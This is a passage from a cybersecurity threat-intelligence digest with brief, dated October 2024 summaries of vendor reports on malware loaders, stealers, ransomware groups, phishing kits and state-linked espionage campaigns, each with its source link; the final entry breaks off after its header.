Summary:: Researchers from HarfangLab have discovered a malware campaign in which attackers are delivering Lumma Stealer malware by using a tool called Hijack Loader. This loader also known as DOILoader or SHADOWLADDER that first appeared in September 2023. The attackers are using legitimate code-signing certificates to make their malicious files genuine. This malware campaign trick users with fake CAPTCHA pages where users are asked to run encoded PowerShell commands. These commands drop a malicious payload that hidden in a ZIP file which decrypts and runs the final stage of Hijack Loader which downloads Lumma Stealer.

Source: https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/

Intel Source:: CERT-UA

Intel Name:: UAC_0050_Threat_Actor_Group

Date of Scan:: 2024-10-15

Impact:: LOW

Summary:: CERT-UA researchers have observed the threat actor group UAC-0050. This group is involved in activities such as cyber espionage, stealing funds, and psychological operations under the name Fire Cells Group. The group targets Ukrainian businesses and entrepreneurs by gaining unauthorized access to accountants' machine through tools like REMCOS and TEKTONITRMS for stealing the funds. After stealing funds, they often convert the money into cryptocurrency. They have made at least 30 attempts to forge financial payments through remote banking systems with amounts ranging from tens of thousands to millions in just one month. Additionally, they spread false messages about threats like bombings and contract killings as part of their psychological operations.

Source: https://cert.gov.ua/article/6281009

Intel Source:: Fortinet

Intel Name:: Ivanti_CSA_Vulnerabilities_Enable_Network_Breach

Date of Scan:: 2024-10-15

Impact:: MEDIUM

Summary:: FortiGuard researchers have investigated a recent case where an advanced adversary exploited three vulnerabilities in the Ivanti Cloud Services Appliance (CSA), including two that were previously unknown. During an incident response engagement, researchers discovered that the attacker gained initial access to the victim's network by leveraging CVE-2024-8190 alongside these zero-day vulnerabilities.

Source: https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa

Intel Source:: Open AI

Intel Name:: Iranian_Cyber_Group_Exploits_ChatGPT_for_Attacks

Date of Scan:: 2024-10-15

Impact:: LOW

Summary:: OpenAI reported disrupting over 20 cyber and influence operations this year, notably involving Iranian and Chinese state-sponsored hackers. One identified group, CyberAv3ngers, linked to the Iranian Islamic Revolutionary Guard Corps (IRGC), previously targeted industrial control systems in Ireland and the U.S. Instead of sophisticated hacking methods, they exploited systems with default credentials. Their use of ChatGPT focused on reconnaissance, seeking information on vulnerabilities, default credentials, and assistance with coding, including creating scripts for penetration testing and malicious code obfuscation. The group showed particular interest in targets in Jordan and Central Europe.

Source: https://cdn.openai.com/threat-intelligence-reports/influence-and-cyber-operations-an-update_October-2024.pdf

Intel Source:: Palo Alto

Intel Name:: Phishing_Targets_via_Customized_Login_Pages

Date of Scan:: 2024-10-14

Impact:: MEDIUM

Summary:: Unit42 researchers have identified a sophisticated phishing operation that creates personalized fake login pages tailored to individual victims based on their email addresses. This system targets a range of sectors, including commercial, educational, government, and nonprofit organizations. While they've traced some of these deceptive login pages back to email attachments, the delivery methods are not confined to email alone.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-11-IOCs-for-advanced-phishing-activity.txt

Intel Source:: SonicWall

Intel Name:: CoreWarrior_Malware

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: SonicWall researchers have examined a new malware called CoreWarrior. This malware is persistent and spread quickly by creating multiple copies of itself. It also connects to several IP addresses, opens multiple backdoor connections and monitors user activity. When the malware runs, it creates copy of itself with a random name and uses the command prompt and Curl to transfer the data. After each successful data transfer, the malware deletes the old copy and makes a new one. It also gathers information about the system drives and monitors command prompt activity.

Source: https://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/

Intel Source:: Zscaler

Intel Name:: A_Deep_Dive_Into_DarVision_RAT

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: Zscaler Researchers have identified a malware called DarkVision RAT that first emerged in 2020 and became popular among cyber criminal due to its low cost and advance features. This allows attackers to perform various malicious activities such as keylogging, taking screenshots, stealing passwords, and executing remote commands. The malware communicates with its control server, steals sensitive information, and disable antivirus. It can also use plugins to add features like recording audio, accessing the webcam, and even hijacking system processes.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-darkvision-rat

Intel Source:: Palo Alto

Intel Name:: Lynx_Ransomware

Date of Scan:: 2024-10-14

Impact:: MEDIUM

Summary:: Lynx ransomware, a successor to the previously identified INC ransomware, emerged in July 2024 and has been actively targeting a range of sectors in the U.S. and UK, including retail, real estate, and finance. Sharing significant portions of its source code with INC, Lynx operates on a ransomware-as-a-service (RaaS) model and employs sophisticated double-extortion tactics, exfiltrating victims' data before encryption to increase pressure for ransom payments. Researchers have noted that while Windows samples of Lynx have been observed, Linux variants have yet to be confirmed. The ransomware's delivery mechanisms include phishing emails, malicious downloads, and hacking forums. Lynx encrypts files using AES-128 and Curve25519 algorithms, appending a .lynx extension to encrypted files, and deletes backup partitions to maximize its impact.

Source: https://unit42.paloaltonetworks.com/inc-ransomware-rebrand-to-lynx/

Intel Source:: ESET

Intel Name:: Telekopye_Targeting_MarketPlace_Users

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: ESET researcher have discovered a tool called Telekopye which helps cyber criminals to target online marketplace users such as those on booking.com and Airbnb to steal their payment card information. The attackers use stolen login credentials from legitimate accommodation providers to send fake messages about payment problems that redirect them to fraudulent websites that closely mimic legitimate booking sites. Victims are then tricked into entering their payment card information on these phishing websites. This scam become common during the summer holidays when people do online reservations.

Source: https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/

Intel Source:: Trend Micro

Intel Name:: Rising_Threat_from_Earth_Simnavaz_in_Gulf_Region

Date of Scan:: 2024-10-14

Impact:: MEDIUM

Summary:: Trend Micro researchers have reported increased activity from the cyber espionage group Earth Simnavaz (also known as APT34 or OilRig), which is linked to Iranian interests. This group primarily targets the energy sector and critical infrastructure, particularly within the UAE and Gulf region. Their recent tactics include deploying a new backdoor to exfiltrate sensitive credentials from Microsoft Exchange servers, utilizing techniques to extract clean-text passwords, and leveraging the RMM tool ngrok for persistence. Additionally, they have incorporated the exploitation of CVE-2024-30088 for privilege escalation.

Source: https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks-uae-gulf-regions.html

Intel Source:: Trend Micro

Intel Name:: Water_Makara_Target_Multiple_Entities_in_Brazil

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: Researcher from Trend Micro have identified a spear phishing campaign where attackers are targeting retail, manufacturing, and government entities in Brazil. The attacker uses fraudulent emails disguised as important tax documents that trick users into downloading malicious zip files which contains hidden script and LNK files and when user open these files, it executes malicious commands. The attackers also use JavaScript which helps to connect with C2 server. The malware used in this campaign is Astaroth which is a known banking trojan that steals sensitive information.

Source: https://www.trendmicro.com/en_us/research/24/j/water-makara-uses-obfuscated-javascript-in-spear-phishing-campai.html

Intel Source:: Hunt.io

Intel Name:: Earth_Baxi_PlugX_Activity

Date of Scan:: 2024-10-14

Impact:: MEDIUM

Summary:: An investigation into malicious infrastructure revealed two distinct networks linked to the threat actors Earth Baxia and PlugX, driven by the analysis of unconventional SSL/TLS certificates and unique HTTP redirects. Earth Baxia, believed to be a China-based group, utilized Cloudflare certificates and self-signed certificates impersonating Microsoft, alongside HTTP 301 redirects to legitimate sites like the FBI and NASA, creating a facade of benign activity. Meanwhile, the PlugX network was identified through certificates containing the "AES" string and HTTP 302 redirects to Google, marked by irregularities in the response headers.

Source: https://hunt.io/blog/unmasking-adversary-infrastructure-how-certificates-and-redirects-exposed-earth-baxia-and-plugx-activity

Intel Source:: Intezer

Intel Name:: Examination_of_Novel_IMEEX_Framework

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: Researchers at Intezer have deeply analyzed the IMEEX framework which is a newly discovered malware targeting Windows systems, delivered as a 64-bit DLL that provides attackers with extensive control over compromised machines. It features capabilities such as executing additional modules, file manipulation, process management, and remote command execution, while also conducting system reconnaissance and relaying critical information to a command-and-control (C2) server. Primarily targeting Djibouti and a less capable variant in Afghanistan, the malware employs advanced techniques to maintain persistence and avoid detection.

Source: https://intezer.com/blog/research/technical-analysis-of-a-novel-imeex-framework/

Intel Source:: BI Zone

Intel Name:: Core_Werewolf_Targets_Russian_Government_Entities

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: Researchers at BI zone have observed the activity of Core Werewolf group which has been targeting Russia defense entities and critical infrastructure since 2021. The attackers are using malware which is written AutoIt language and distributing malicious files through telegram as well as emails in this campaign. The malware is in password-protected RAR files which contains decoy PDF that include malicious AutoIt script, and a legitimate interpreter. When the user opens these files, it runs on the system and collects system information, including the computer's name, user details, and a list of files on the Desktop then sends it to a C2 server.

Source: https://bi.zone/eng/expertise/blog/ne-budi-likho-core-werewolf-sovershenstvuet-ataki-na-rossiyskie-gosorganizatsii/

Intel Source:: ESET Research

Intel Name:: Telekopye_Toolkit_Spreads_Online_Marketplace_Scams

Date of Scan:: 2024-10-14

Impact:: LOW

Summary:: ESET researchers have uncovered new insights into Telekopye, a versatile scam toolkit employed by numerous groups to orchestrate online marketplace fraud. Targeting platforms like OLX, Vinted, eBay, and Wallapop, primarily in Europe and North America, Telekopye simplifies the scamming process, requiring little technical expertise from users. It offers features such as automated phishing webpage creation, an interactive multilingual chatbot, and anti-DDoS protection, enabling scammers, referred to as Neanderthals, to defraud individuals, dubbed Mammoths, on a massive scale.

Source: https://web-assets.esetstatic.com/wls/en/papers/white-papers/marketplace-scams.pdf

Intel Source:: BI.ZONE

Intel Name:: Threat_Actors_Using_Havoc_Framework

Date of Scan:: 2024-10-10

Impact:: LOW

Summary:: Researchers at BI.ZONE have observed that attackers are increasingly employing pentesting tools such as the Havoc framework to circumvent cybersecurity solutions. This tool is less widespread than others, such as Cobalt Strike or Metasploit, making it more difficult to identify. In this campaign, the Mysterious Werewolf group took a similar approach to the Mythic framework. Phishing emails, which frequently impersonate trustworthy institutions, remain a popular strategy for attackers to acquire access.

Source: https://bi.zone/eng/expertise/blog/khaos-v-kiberprostranstve-gruppirovki-eksperimentiruyut-s-instrumentami/

Intel Source:: Palo Alto

Intel Name:: Malicious_Clockify_Ads_Distribute_Malware

Date of Scan:: 2024-10-10

Impact:: LOW

Summary:: Unit42 researchers have observed on October 8, 2024, a malicious Google ad led users to a counterfeit Clockify site distributing malware. The site offered two downloads: a 704 kB disk image (DMG) for Mac and a 115.7 MB executable for Windows. The Mac DMG contained a Mach-O executable that varied in file hash, name, and size with each download, and was designed to exfiltrate data from macOS systems after bypassing user warnings and password prompts. In contrast, the Windows executable consistently delivered a 116.5 MB MSI installer, which included Lumma Stealer. This infection process involved retrieving Lumma Stealer from a password-protected RAR file.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-08-IOCs-for-malware-from-fake-Clockify-site.txt

Intel Source:: Hunt.IO

Intel Name:: Exposed_Server_Reveals_Cyberattack_Tools

Date of Scan:: 2024-10-10

Impact:: LOW

Summary:: Researchers from Hunt.IO have identified a cybercriminal's server containing DDoS scripts, SpyNote spyware disguised as popular programs, phishing pages targeting digital currency organizations, and ransom notes. A simple Python script, ddos.py, attempted to target a non-profit website in Israel that promotes accessibility for individuals with limitations.

Source: https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages

Intel Source:: Jscrambler

Intel Name:: New_Unicode_Skimmer_Targets_Ecommerce_Data

Date of Scan:: 2024-10-10

Impact:: LOW

Summary:: The Jscrambler researchers have identified a new digital skimmer campaign utilizing Unicode obfuscation techniques, known as the Mongolian Skimmer. The skimmer's script is heavily obfuscated with accented and invisible Unicode characters, making it difficult for humans to read. It leverages JavaScript's flexibility to hide malicious functionality, primarily aimed at stealing sensitive information from e-commerce checkout and admin pages, which is then sent to an attacker-controlled server.

Source: https://jscrambler.com/blog/the-mongolian-skimmer

Intel Source:: Doctor Web

Intel Name:: Crypto_Stealing_Malware_Campaign

Date of Scan:: 2024-10-10

Impact:: LOW

Summary:: Researchers from Doctor Web have discovered a malware campaign that has affected 28,000 users, primarily in Russia, but also in Belarus, Uzbekistan, Kazakhstan, Ukraine, and Turkey. The attackers use fake YouTube videos and GitHub repositories to trick victims into downloading password-protected archives and once the archive is opened and a password is entered then malicious scripts and files are installed on the victim's computer. The malware communicates with attackers through Ncat network utility and collects system information sends system information via a Telegram bot. It delivers two payload such as mines cryptocurrency that use the victim's computer and clipper that steals cryptocurrency by replacing wallet addresses in the clipboard.

Source: https://news.drweb.com/show/?i=14920&lng=en

Intel Source:: G DATA

Intel Name:: Attackers_Use_Bitbucket_to_Distribute_AsyncRAT

Date of Scan:: 2024-10-10

Impact:: MEDIUM

Summary:: Researchers at GDATA have recently investigated a sophisticated attack campaign utilizing a multi-stage approach to deliver AsyncRAT through Bitbucket, a popular code hosting platform. This tactic leverages the platform's legitimacy and accessibility, allowing attackers to host malicious payloads like Predator stealer, Azorult stealer, and STOP ransomware without raising suspicion.

Source: https://www.gdatasoftware.com/blog/2024/10/38043-asyncrat-bitbucket

Intel Source:: SonicWall

Intel Name:: Horus_Protector

Date of Scan:: 2024-10-09

Impact:: LOW

Summary:: Researchers at Sonic Wall have discovered a new malware distribution service called Horus Protector. This service is used to distribute various types of malwares such as AgentTesla, Remcos, Snake, and NjRat. The creator of this tool is French-speaking and communicate with their users through a Telegram group where they provide updates and offer different service packages from $50 to $150 per month. This tool uses a .zip file containing a VBE script to distribute malware and collects unique information from the user’s machine and sends it to the server.

Source: https://blog.sonicwall.com/en-us/2024/10/horus-protector-part-1-the-new-malware-distribution-service/

Intel Source:: ISC.SANS

Intel Name:: From_Perfctl_to_InfoStealer

Date of Scan:: 2024-10-09

Impact:: LOW

Summary:: SANS researchers have recently identified a new stealthy malware named perfctl targeting Linux hosts gained attention. Although the malware has been thoroughly analyzed, a copy of its "httpd" binary was tested in a lab environment. The malware was deployed without root privileges, which resulted in similar behavior to its expected operation, but with some limitations. Specifically, it was unable to write to certain file locations due to lack of access, and the rootkit features were not activated, causing the malware to operate more visibly.

Source: https://isc.sans.edu/diary/rss/31334

Intel Source:: Checkpoint

Intel Name:: Operation_MiddleFloor

Date of Scan:: 2024-10-09

Impact:: MEDIUM

Summary:: Checkpoint researchers have identified a disinformation campaign called Operation MiddleFloor which is targeting government and education sectors of Moldova. Attackers aim to influence the country's upcoming elections on EU membership by using fake emails and documents that appears to come from European Commission or Moldavian ministries. These emails spread false information such gas prices, LGBT rights, anti-corruption measures and immigration to create fear regarding Moldova’s potential EU membership. The campaign also collects personal information from the victims for future attacks. It is believed that Lying Pigeon is behind this campaign as per their TTPs and speaking Russian and linked to Russian interests.

Source: https://research.checkpoint.com/2024/disinformation-campaign-moldova/

Intel Source:: Recorded Future

Intel Name:: Rhysida_Ransomware_Group

Date of Scan:: 2024-10-09

Impact:: MEDIUM

Summary:: Researchers at Insikt group have identified a multi-layered infrastructure of Rhysida ransomware group. This infrastructure includes typo-squatted domains, SEO poisoning, and payload servers for the initial infection. They use tools like CleanUpLoader for data exfiltration and Zabbix for monitoring purposes. Rhysida group operates as RaaS and employs double extortion tactics which involve stealing data and threatening to leak it if the ransom isn't paid. The group primarily targets critical sectors such as education, healthcare, and infrastructure like the Port of Seattle to steal sensitive personal data such as passports and identification documents. The group use various methods to gain access such as phishing, exploiting vulnerabilities, stolen credentials, lack of MFA and malvertising that trick users into downloading malware.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-1009.pdf

Intel Source:: Trustwave

Intel Name:: New_Malware_Pronsis_Loader

Date of Scan:: 2024-10-09

Impact:: MEDIUM

Summary:: Researchers at Trustwave have discovered a new malware called Pronsis Loader, with its earliest variant identified in November 2023. It shares similarities with the D3F@ck Loader, which emerged in January 2024, particularly in using JPHP-compiled executables that allow for easy interchangeability. However, they differ in their installation methods, D3F@ck Loader employs Inno Setup Installer, while Pronsis Loader utilizes the Nullsoft Scriptable Install System (NSIS). Pronsis Loader has been observed delivering various malware variants, including Lumma Stealer and Latrodectus.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/

Intel Source:: Morphisec

Intel Name:: Lua_Malware_Targets_Educational_Sector

Date of Scan:: 2024-10-09

Impact:: LOW

Summary:: Researchers from Morphisec Threat Labs have identified a new Lua malware which is targeting educational sector mainly student gamer community. The malware has been distributing across North America, South America, Europe, Asia, and Australia. It often spreads through platforms like GitHub where users looking for game cheats and mistakenly download malicious files. The malware is delivered in ZIP files that include a Lua compiler, a DLL file, a Lua script, and a batch file. Once the batch file is run, the malware connects to a C2 server to receive instructions such as staying hidden or downloading more malicious software. This malware installs Infostealers like Redline that collect user credentials to be sold on the dark web for further attacks.

Source: https://blog.morphisec.com/threat-analysis-lua-malware

Intel Source:: Palo Alto

Intel Name:: DPRK_Hackers_Target_Tech_Job_Seekers_with_Malware

Date of Scan:: 2024-10-09

Impact:: LOW

Summary:: Researchers at Palo Alto have found that North Korean hackers posing as recruiters in order to lure tech job seekers into installing malware. This operation is known as the "CL-STA-240 Contagious Interview" campaign. Since their initial mention in November 2023, these hackers have updated two malware variants: BeaverTail and InvisibleFerret. The BeaverTail malware targets both macOS and Windows, and the InvisibleFerret backdoor has been updated as well.

Source: https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/

Intel Source:: Cyble

Intel Name:: A_New_MisterioLNK_Loader_Builder

Date of Scan:: 2024-10-08

Impact:: LOW

Summary:: CRIL Researchers have discovered a new loader called MisterioLNK which is available as an open source on GitHub. This tool helps attackers to create different types of loader files such as HTA, BAT, CMD, VBS, and LNK which download and execute malicious software without being easily detected. It allows users to customize the icons of LNK files to make them appear more legitimate. This makes MisterioLNK a powerful tool for cybercriminals, as it can be used to distribute malware like Remcos RAT, DC RAT, and BlankStealer.

Source: https://cyble.com/blog/misteriolnk-the-open-source-builder-behind-malicious-loaders/

Intel Source:: ANY RUN

Intel Name:: SSLoad_Distributed_by_New_PhantomLoader_Malware

Date of Scan:: 2024-10-08

Impact:: LOW

Summary:: PhantomLoader is a sophisticated malware disguised as a legitimate 32-bit DLL associated with 360 Total Security antivirus software. Recently, it has been found masquerading as PatchUp.exe, a genuine software module. Unique in its approach, PhantomLoader employs binary patching to embed itself within legitimate executables, utilizing self-modifying techniques to decrypt and load a new rust-based malware called SSLoad into memory. Analysis of SSLoad in ANY.RUN’s sandbox revealed that one distribution method involves phishing emails containing malicious Office documents, which trigger the infection chain.

Source: https://any.run/cybersecurity-blog/phantomloader-and-ssload-analysis/

Intel Source:: Zscaler

Intel Name:: The_Dark_Angels_Ransomware_Group

Date of Scan:: 2024-10-08

Impact:: MEDIUM

Summary:: Researchers from Zscaler have uncovered a ransomware group called The Dark Angels. This group emerged in 2022. They are operating from Russian speaking regions and targets organisations across the U.S., Europe, South America, and Asia. This group has created their own leaked site named Dunghill Leak, on the dark web to publish stolen information. The group leverages third-party ransomware tools like Babuk and RTM Locker to encrypt Windows files and RagnarLocker for Linux/ESXi systems. Dark Angels infiltrates networks using techniques such as phishing emails and exploiting software vulnerabilities. The group often spends days or weeks transferring large amounts of stolen data before deploying ransomware or demanding payment to prevent data leaks.

Source: https://www.zscaler.com/blogs/security-research/shining-light-dark-angels-ransomware-group#indicators-of-compromise--iocs-

Intel Source:: ESET

Intel Name:: GoldenJackal_Targets_Air_Gapped_Systems

Date of Scan:: 2024-10-08

Impact:: LOW

Summary:: Researchers at ESET have discovered that the GoldenJackal cyberespionage gang targeted air-gapped systems in a campaign from May 2022 to March 2024, with a focus on a European government institution. GoldenJackal used confidential tools to access isolated systems, collect and exfiltrate sensitive data, and spread commands across networks.

Source: https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/

Intel Source:: Palo Alto

Intel Name:: New_DNS_Tunneling_Campaigns_Uncovered

Date of Scan:: 2024-10-07

Impact:: MEDIUM

Summary:: Researchers from Palo Alto Networks have discovered four previously unknown DNS tunneling campaigns using their newly implemented campaign monitoring system. DNS tunneling enables threat actors to pass through typical firewalls and create covert pathways for data exfiltration. The monitoring system finds tunneling domains by examining shared characteristics and intercorrelations between harmful activities.

Source: https://unit42.paloaltonetworks.com/detecting-dns-tunneling-campaigns/

Intel Source:: Securelist

Intel Name:: Awaken_Likho_Targets_Russian_Agencies

Date of Scan:: 2024-10-07

Impact:: LOW

Summary:: Researchers from Securelist have found a new campaign by the Awaken Likho APT group that targeted Russian government entities and organizations between June and August 2024. The attackers switched from leveraging the UltraVNC module to the legitimate MeshCentral platform's MeshAgent for remote access.

Source: https://securelist.com/awaken-likho-apt-new-implant-campaign/114101/

Intel Source:: Sekoia

Intel Name:: Mamba_2FA_A_New_AiTM_Phishing_Tool

Date of Scan:: 2024-10-07

Impact:: LOW

Summary:: Sekoia researchers have identified a phishing campaign leveraging fake Microsoft 365 login pages to steal user credentials. These phishing pages are being used as HTML attachments in emails to bypass multi-factor authentication (MFA). Researchers also discovered a new tool called Mamba 2FA in this campaign which works as an adversary-in-the-middle that capture user credentials and sending them to attackers via a Telegram bot. Mamba 2FA is sold as a phishing-as-a-service (PhaaS) kit on Telegram which allow attackers to create phishing links and HTML attachments for $250 per month. Additionally, the phishing pages mimic the branding of targeted companies to appear more legitimate.

Source: https://blog.sekoia.io/mamba-2fa-a-new-contender-in-the-aitm-phishing-ecosystem/

Intel Source:: Cybereason

Intel Name:: Cuckoo_Threat_Actor_Arsenal_Explored

Date of Scan:: 2024-10-07

Impact:: LOW

Summary:: Cybereason researchers have observed the activities of a sophisticated threat actor known as APT10, which has been conducting a campaign named Cuckoo Spear. This campaign involves the deployment of two primary malware tools: NOOPLDR and NOOPDOOR. NOOPLDR is a DLL loader that establishes persistence on compromised systems by registering as a Windows service, obfuscating its code, and injecting shellcode obtained from the registry. NOOPDOOR is a backdoor that operates by loading and decrypting shellcode stored in the registry, enabling the threat actor to execute commands and control the infected system remotely.

Source: https://www.cybereason.com/blog/cuckoo-spear-pt2-threat-actor-arsenal

Intel Source:: MalwareBytes

Intel Name:: Google_Ads_campaign_targets_utility_software

Date of Scan:: 2024-10-07

Impact:: LOW

Summary:: Researchers from Malwarebytes have discovered a campaign in which users of software such as Slack, Notion, Calendly, Odoo, and Basecamp are being targeted through malicious Google ads. These ads look legitimate and appears at the top of the Google search results to tricks users into downloading malware. Windows users are redirected to GitHub that download an infostealer malware called Rhadamathys, while Mac users receive a variant of the AMOS (Atomic Stealer) infostealer. This malware steals passwords and sensitive information and sending it to a server located in Russia.

Source: https://www.malwarebytes.com/blog/news/2024/10/large-scale-google-ads-campaign-targets-utility-software

Intel Source:: Cyfirma

Intel Name:: Yunit_Stealer

Date of Scan:: 2024-10-07

Impact:: LOW

Summary:: Cyfirma researchers have discovered a new malware called Yunit Stealer that steals sensitive information such as login credentials, browser, and cryptocurrency wallet. This malware can modify system settings, creating scheduled tasks, and disabling Windows Defender to stay hidden. The malware uses JavaScript tool for gathering system information, run commands and send data online. The stolen data is sent to attackers through messaging platforms like Telegram and Discord.

Source: https://www.cyfirma.com/research/yunit-stealer/

Intel Source:: Rapid7

Intel Name:: CyberVolk_Ransomware_updates

Date of Scan:: 2024-10-05

Impact:: LOW

Summary:: Researchers from Rapid7 have identified a politically motivated hacktivist group called CyberVolk which has transitioned into using Ransomware. This group is aligned with Pro-Russian activities and primary target to geopolitical events. The activities of this group have increased after the arrest of members from another hacktivist group called NoName57(16), who had been targeting NATO-aligned countries. This group also launched coordinated DDoS and ransomware attacks against Spain and affected 27 organisations because NoName member were detained there.

Source: https://www.rapid7.com/blog/post/2024/10/03/ransomware-groups-demystified-cybervolk-ransomware/

Intel Source:: Aqua

Intel Name:: Perfctl_Malware_Targeting_Linux_Servers

Date of Scan:: 2024-10-05

Impact:: MEDIUM

Summary:: Researchers from Aqua have identified a new Linux malware called Perfctl, which has been targeting millions of Linux servers over the last few years. This malware has been taking advantage of over 20,000 types of misconfigurations and exploiting vulnerabilities in servers across the globe. It uses rootkits to hide its presence, leverages TOR for encrypted communications, and masquerades as legitimate system processes to avoid detection. Once Perfctl is on a system, it deletes its own files after running, copies itself to different parts of the system under fake names and continues running in the background as a service. It also modifies login scripts so it can run every time someone logs into the server.

Source: https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/

Intel Source:: Proofpoint

Intel Name:: Prince_Ransomware

Date of Scan:: 2024-10-05

Impact:: MEDIUM

Summary:: Proofpoint researchers uncovered a ransomware campaign called Prince Ransomware which is targeting people in the UK and the U.S. The attackers impersonating the British postal service, Royal Mail to deliver the ransomware that is freely available on GitHub. They use both contact forms and emails to send out their fake messages from Proton Mail addresses and each message come from a different email address. This ransomware encrypts files, adds the ".womp" extension and displays a fake Windows Update screen to disguise the process. Once the files are encrypted then they cannot be decrypted which means the purpose is destruction rather than for financial gain.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-royal-mail-lures-deliver-open-source-prince-ransomware

Intel Source:: Palo Alto

Intel Name:: Ukrainian_Phishing_Emails_Deliver_RMS_Malware

Date of Scan:: 2024-10-04

Impact:: LOW

Summary:: PaloAlto researchers have observed that on October 1, 2024, phishing emails in Ukraine were distributed using a payment order theme and a malicious PDF attachment. Three examples are identified, targeting the Ukrainian government and a US university email address. The PDF spoofed a Ukraine-based bank and included a link to a now-defunct Bitbucket repository hosting a malicious 7-zip file.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-01-IOCs-for-RMS-based-malware.txt

Intel Source:: Cyfirma

Intel Name:: Vilsa_Stealer

Date of Scan:: 2024-10-04

Impact:: LOW

Summary:: CYFIRMA researchers have identified a new malware called Vilsa Stealer on GitHub, notable for its speed and effectiveness in extracting sensitive data. This sophisticated tool is user-friendly and features advanced security bypass capabilities, making it a significant threat for covert data collection. Vilsa Stealer targets a wide range of personal and system information, including browser credentials, tokens, browsing history, and financial details, making it a formidable tool for cybercriminals.

Source: https://www.cyfirma.com/research/vilsa-stealer/

Intel Source:: Sekoia

Intel Name:: Bulbature_and_GobRAT_Infrastructure_Analysis

Date of Scan:: 2024-10-04

Impact:: LOW

Summary:: Researchers at Sekoi have discovered an infrastructure in mid-2023 that uses compromised edge devices to transform them into Operational Relay Boxes, allowing for cyberattacks. A total of 63 servers were located and evaluated, and the infrastructure was still operational as of the report's publishing. Some servers store installation scripts and GobRAT and Bulbature malware, while others provide management interfaces for controlling compromised hosts and executing attacks.

Source: https://blog.sekoia.io/bulbature-beneath-the-waves-of-gobrat/#h-indicators-of-compromise

Intel Source:: Securelist

Intel Name:: Hidden_Malware_in_Free_Software

Date of Scan:: 2024-10-04

Impact:: LOW

Summary:: Researchers at Securelist have described an exploit that targets individuals looking for free software or game hacks. The attackers exploited sophisticated tactics to obtain complete control of systems, especially for cryptocurrency mining. Some malware types may also alter wallet addresses and capture images. Securelist noted uncommon approaches like as transforming security software into backdoors and masking harmful files under valid digital signatures, making detection more difficult.

Source: https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/

Intel Source:: Palo Alto

Intel Name:: Lumma_Stealer_Campaign_Linked_to_GitHub_Accounts

Date of Scan:: 2024-10-04

Impact:: LOW

Summary:: Researchers at PaloAlto have identified an active campaign using SmartLoader to distribute Lumma Stealer has been tracked since July 31, 2024. The infection chain primarily involves a private GitHub account named user-attachments, along with several other accounts. The campaign utilizes zip archives hosted on these GitHub accounts, which consistently contain four files: compiler.exe, conf.txt, Launcher.bat, and lua51.dll. The infection process is initiated by the Launcher.bat file, which executes the command start compiler.exe conf.txt. For the infection to be successful, all four files must be present in the same directory, although the file hashes and sizes vary between different zip archives.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-03-IOCs-for-SmartLoader-to-Lumma-Stealer.txt

Intel Source:: Cisco Talos

Intel Name:: New_MedusaLocker_Ransomware_Variant_Discovered

Date of Scan:: 2024-10-03

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos have discovered a financially motivated threat actor who has been active since late 2022, spreading a new MedusaLocker ransomware variant known as "BabyLockerKZ." Initially, this gang targeted European countries, but since mid-2023, their focus has turned to South America, resulting in a greater number of victims. This variant, created by the same developer, features unique autorun keys and additional registry key sets.

Source: https://blog.talosintelligence.com/threat-actor-believed-to-be-spreading-new-medusalocker-variant-since-2022/

Intel Source:: Bitdefender

Intel Name:: Meow_and_Meow_Leaks_Ransomware_Group

Date of Scan:: 2024-10-03

Impact:: MEDIUM

Summary:: Bitdefender researchers have identified two ransomware groups called Meow and Meow Leaks but their relationship is unclear whether they are linked to each other or are two separate entities. Meow first emerged in 2022 and operates as a Ransomware as a Service (RaaS). This group targets organizations in countries such as the United States, UK, Nigeria, and Italy. They gain the access through zero-day exploits or using vulnerabilities to encrypt the files with .meow extension and demanding ransom payments via email or Telegram. On the other hand, Meow Leaks first emerged in 2023 and their focus on exfiltrating the data from victim organisation instead of encrypting system and sell it on a marketplace called "Market Meow Leaks" on the dark web. This group targets sector such as government, healthcare, education, technology, and finance in countries like the U.S., UK, Germany, and Japan. The group uses secure communication platforms like Jabber, TOX, and Matrix instead of Telegram.

Source: https://www.bitdefender.com/blog/businessinsights/meow-meow-leaks-and-the-chaos-of-ransomware-attribution/

Intel Source:: Silent Push

Intel Name:: FIN7_Uses_Fake_AI_Sites_to_Spread_Malware

Date of Scan:: 2024-10-03

Impact:: LOW

Summary:: Researchers at SilentPush have discovered that the FIN7 organization uses fake web pages promising an AI "DeepNude Generator" for spreading malware. They built up at least seven separate websites, providing two types of downloads: straightforward and one with a false "free trial" approach. FIN7 is also operating a separate campaign in which pop-up ads prompt visitors to install a browser plugin that eventually delivers malware.

Source: https://www.silentpush.com/blog/fin7-malware-deepfake-ai-honeypot/

Intel Source:: ESET

Intel Name:: CeranaKeeper_New_China_Group_Targeting_Thailand

Date of Scan:: 2024-10-03

Impact:: MEDIUM

